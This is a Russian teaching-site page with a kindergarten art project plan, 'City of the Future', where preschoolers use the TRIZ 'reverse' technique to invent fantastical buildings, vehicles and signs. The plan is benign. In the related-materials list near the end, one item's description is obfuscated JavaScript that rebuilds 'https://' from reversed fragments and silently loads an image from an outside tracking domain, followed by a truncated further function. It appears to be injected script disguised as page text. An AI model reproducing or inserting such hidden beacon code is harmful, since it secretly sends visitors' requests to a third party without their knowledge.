Проект "Город будущего или как создать фантастический образ в изобразительной деятельности"
проект по рисованию (подготовительная группа)

Щелканова Людмила Константиновна

Паспорт проекта

Скачать:

ВложениеРазмер
Microsoft Office document icon gorod_budushchego.doc166.5 КБ

Предварительный просмотр:

Муниципальное автономное образовательное учреждение «Детский сад  «Снегурочка»

Паспорт проекта.

Тема: «Город будущего, или как создать фантастический образ в изобразительной деятельности»

Участники проекта: дети подготовительной группы

Руководитель проекта:

Щелканова Л. К,

Воспитатель

Тема проекта:  «Город будущего, или как создать фантастический образ в изобразительной деятельности»

При реализации данного проекта использовалась технология решения изобретательских задач, раздел типовые приемы фантазирования (ОТСМ-ТРИЗ)

Проблема: 

дети старшего дошкольного возраста испытывают затруднение, получив задание на тему фантазирования, так как  к этому возрасту у многих детей появляется привычка действовать по образцу, а также  согласно инструкции взрослого. Со временем дети  привыкают к стандартизации мышления и поэтому появилась цель проекта: 

Формирование умения фантазирования с использованием схемы или алгоритма действия.(ОТСМ-ТРИЗ)

Для реализации данной цели были поставлены следующие задачи:

-развивать умение анализировать объекты по определенным признакам (форма, размер, способ действия и т. д.)

-закреплять умение работать руководствуясь алгоритмом действия

-формировать навыки совместной деятельности, воспитывать доброжелательное отношение друг к другу

-активизировать фантазию, воображение, создать условия для эмоционального и творческого самовыражения.

Тип проекта:

-по количеству участников: групповой

-по приоритету метода: творческий

-по продолжительности: краткосрочный (29 марта– 2 апреля)

Анализ работы над проектом.

  1. Копилка

Сбор информации о городе и его составляющих: транспорт, здания, деревья, люди, дорожные знаки и правила дорожного движения. В копилку вошли картинки, иллюстрации, фотографии. На данном этапе с детьми был проведен сравнительный анализ архитектурных сооружений разных времен и народов, сделан вывод о культурной и исторической ценности.

       

2. Картотека

Собранную информацию разделили по двум признакам: объекты – классические, и объекты в которых есть элемент необычного. Сделали вывод, что необычных элементов меньше чем классических. После предложения создать новые необычные элементы дети испытали затруднение. После чего  и решили придумать алгоритм создания новых необычных объектов или их деталей.

       

3. Модель

Создание вместе с детьми алгоритма для осуществления приема фантазирования используя типовой прием фантазирования «Наоборот».

 Алгоритм:

Возьми объект; выдели признак, измени признак наоборот.

Например: Объект – дом; признак – форма (куб), наоборот – шар, расположение – на земле, наоборот – в воздухе, на подвесках и т. д.

Детали дома:  окна по форме квадратные, расположение в линию, наоборот – окна по форме разные, расположение хаотичное; двери по форме прямоугольные, расположение – внизу, наоборот – двери по форме круглые, расположение на крыше, и т.д.

Алгоритм фантазирования был применен для всех объектов в городе: транспорт, здания, деревья, люди, дорожные знаки. Особое внимание было уделено разработке экологически чистого топлива для транспорта, а также способа передвижения, благодаря, которому не будет аварий и не будут страдать пешеходы. Кроме того, в процессе создания города обращали внимание на красоту и эстетичность цветовую гармонию будущего города.

Таким образом, получился

  1. продукт проекта – «Город будущего «Светлогорск»

     

Данный плакат, а также модель проекта по осуществлению приема фантазирования были представлены детям других групп на презентации проекта.


По теме: методические разработки, презентации и конспекты

Педагогический опыт "«Развитие творчества детей старшего дошкольного возраста в изобразительной деятельности через сказку и сказочные образы»"

В материале описан опыт работы по  развитию творчества ребенка в изобразительной деятельности через сказку, сказочный образ, его творческое воплощение.  Обобщены формы и методы  применя...

Методические рекомендации образовательной деятельности (изобразительная деятельность). "Сотворчество педагога и детей младшего и среднего дошкольного возраста в создании образов явлений природы".

Методические рекомендации образовательной деятельности. Образовательная область "Художественно - эстетическое развитие".Изобразительная деятельность.Тема: "Сотворчество педагога и ...

Консультация для педагогов Влияние сказки на формирование художественного образа в изобразительной деятельности

Консультация для педагогов  Влияние сказки на формирование художественного образа в изобразительной деятельности...

Влияние сказки на формирование художественного образа в изобразительной деятельности детей дошкольного возраста.

\'use strict\';var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'fhka.trkg.ru\',\'48\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!wi...

Консультация для педагогов Влияние сказки на формирование художественного образа в изобразительной деятельности

Консультация для педагогов  Влияние сказки на формирование художественного образа в изобразительной деятельности...

Рисование на пищевой плёнке. Нетрадиционная техника рисования. Цель: Способствовать развитию у детей интереса к изобразительное деятельности ; интереса к исследовательской деятельности ; эстетических чувств и эмоций; видение художественного образа и замыс

Рисование на пищевой плёнке. Нетрадиционная техника рисования. Цель: Способствовать развитию у детей интереса к изобразительное деятельности ; интереса к исследовательской деятельности ; эстетических ...

Методические материалы для педагогов "Дидактическая игра как средство создания выразительного образа в изобразительной деятельности детей старшего дошкольного возраста".

Методические материалы для педагогов "Дидактическая игра как средство создания выразительного образа в изобразительной деятельности детей старшего дошкольного возраста"....